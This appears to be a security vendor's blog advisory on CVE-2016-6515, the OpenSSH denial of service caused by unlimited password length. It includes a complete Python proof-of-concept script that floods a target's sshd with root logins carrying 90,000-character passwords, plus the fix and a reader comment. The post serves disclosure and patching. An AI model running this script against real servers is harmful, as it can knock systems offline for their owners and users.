Untitled-3OpenSSH is a free suite of connectivity tool aka OpenBSD Secure Shell, which provides secure encryption for both remote login and file transfer between two hosts over a network.

CVE-2016-6515 (Denial of Service Vulnerability)

It has been discovered that OpenSSH server incorrectly handles password hashing while authenticating non-existing users. In OpenSSH versions prior to 7.3, the ‘auth_password’ function in ‘auth_passwd.c’ script, used in sshd, does not limit length of password. This allows remote attackers to cause a denial of service against the system’s crypt function via sshd.


How does it actually work? Here is the Proof of Concept:

If the remote machine is installed and running OpenSSH version prior to 7.3, it does not limit the password length for authentication. Hence, to exploit this vulnerability, we will send a crafted data which is of 90000 characters in length to the ‘password’ field while attempting to log in to a remote machine via ssh with username as ‘root’.

PoC Code:

#######################################################################
# Open SSH DoS Vulnerability PoC Code
#
# Author:
# Kashinath T
#
# Date: 2016/08/25
#######################################################################

import paramiko
import sys
from random import choice
from string import lowercase

class ssh_exploit:

    def __init__(self):
        """
        Initialise the objects
        """

    def ssh_login(self, remote_ip):
	
        try:
	    ##Crafted password of length 90000
	    passwd_len = 90000
            crafted_passwd = "".join(choice(lowercase) for i in range(passwd_len))

            ##Connect to a remote machine via ssh
	    ssh = paramiko.SSHClient()
	    ssh.load_system_host_keys()
	    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

	    ##calling connect in infinite loop
	    print "[+] Entering infinite loop"
	    while 1:
                ssh.connect(remote_ip, username='root', password=crafted_passwd)
              
	except Exception, msg:
            print "Error in connecting to remote host : ", remote_ip
       	    print "Exception in : ssh_login method."
            sys.exit(msg)

def main():

    if len(sys.argv) != 2:
        print "\n\nEnter Ip of a remote machine\n\n"
        print "usage: python ssh.py 192.168.x.x"
        sys.exit();
        
    ##Calling ssh_connect 
    ref_obj = ssh_exploit()
    ref_obj.ssh_login(sys.argv[1])

if __name__ == "__main__":
    main()

The result of exploiting the OpenSSH DoS vulnerability can be seen in the below screenshot.

SSHCPU

The remote attacker can perform a timely attack to exploit this issue, cause the application to enter into an infinite loop and consume excessive CPU resources (as seen in the above snapshot where CPU usage is 100% by sshd). The impact of this exploit results in a total shutdown of the affected resource, also the attacker can render the resource completely unavailable.

Affected Versions:  OpenSSH Version Prior to 7.3.

Fix: The issue can be resolved by updating the package OpenSSH to version 7.3.

SecPod Saner detects these vulnerabilities and automatically fixes it by applying security updates. Download Saner now and keep your systems updated and secure.

Subscribe For Latest Updates

Get the latest research, best practices, industry trends and cybersecurity blogs from SecPod security experts

Invalid email address
We promise not to spam you. You can unsubscribe at any time.
  1. I am having Trouble recreating this vulnerability. I have 2 virtual machines, one running kali linux and another running ubuntu 12.04. They are on the same network, and can communicate. When I run this the error messsage that I get is Authentication failed. The version of openssh on ubuntu 12.04 is 5.9p1. I have also tried this with ubuntu 14.04, and 16.04. 14.04 runs 6.6.1p1 and 16.04 runs 7.2p2. Is there any reason why this would not affect these systems?

Leave a Reply

Your email address will not be published. Required fields are marked *